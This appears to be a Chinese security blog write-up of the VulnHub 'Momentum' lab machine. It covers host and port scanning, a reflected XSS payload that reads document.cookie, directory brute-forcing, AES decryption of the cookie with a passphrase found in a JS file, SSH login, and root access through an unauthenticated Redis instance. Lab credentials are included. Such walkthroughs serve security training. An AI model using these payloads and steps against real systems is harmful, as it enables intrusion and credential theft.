声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
靶机地址:
https://download.vulnhub.com/momentum/Momentum.ova
内容简介:
在这次打靶过程中,将使用到以下攻击手段:
主机发现
端口扫描
信息收集
XSS漏洞
WEB路径爆破
JS脚本分析
AES解密
Redis认证漏洞
权限提升
1.1 主机发现
arp-scan -l
1.2 端口扫描
nmap -p- 192.168.5.116
nmap -p22,80 -sC -sV 192.168.5.116 
1.3 XSS漏洞
http://192.168.5.116/opus-details.php?id=2123123 当我们修改id的内容时,页面内容会随之变化
构造
http://192.168.5.116/opus-details.php?id=%3Cscript%3Ealert(1)%3C/script%3E这个链接访问会触发xss漏洞
http://192.168.5.116/opus-details.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E访问cookie
得到一个cookie
U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt看起来像加密字段
1.4 Web路径爆破
dirsearch -u http://192.168.5.116
http://192.168.5.116/js/main.js 访问该页面发现加密算法发现了密钥 SecretPassphraseMomentum
1.5 AES解密
参考链接:https://gitee.com/mirrors/crypto-js#aes-encryption在线平台 https://codepen.io/omararcus/pen/QWwBdmo
修改代码
// INIT//var myString = "https://www.titanesmedellin.com/";var myPassword = "SecretPassphraseMomentum";// PROCESSvar encrypted = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt";var decrypted = CryptoJS.AES.decrypt(encrypted, myPassword);//document.getElementById("demo0").innerHTML = myString;//document.getElementById("demo1").innerHTML = encrypted;document.getElementById("demo2").innerHTML = decrypted;document.getElementById("demo3").innerHTML = decrypted.toString(CryptoJS.enc.Utf8);
得到明文auxerre-alienum##
1.6 权限提升(redis认证漏洞)
ssh auxerre@192.168.5.116 // 密码为 auxerre-alienum##
ss -pantu 看到了redis服务6379
查看redis启动账号
ps -aux | grep redis
redis-cliinfokeys * //查看键值对
存在redis未授权漏洞
找到密码m0mentum-al1enum##
su // 密码 m0mentum-al1enum##
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
往期精彩
1、公众号后台回复:搜索大法,获取searchall工具下载链接。
2、公众号后台回复:靶场,获取靶场工具网盘下载链接。
3、公众号后台回复:webshell,获取webshell下载链接。
3、公众号后台回复:验证码,获取验证码工具下载链接。
原文始发于微信公众号(嗨嗨安全):靶机实战系列之Momentum靶机
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论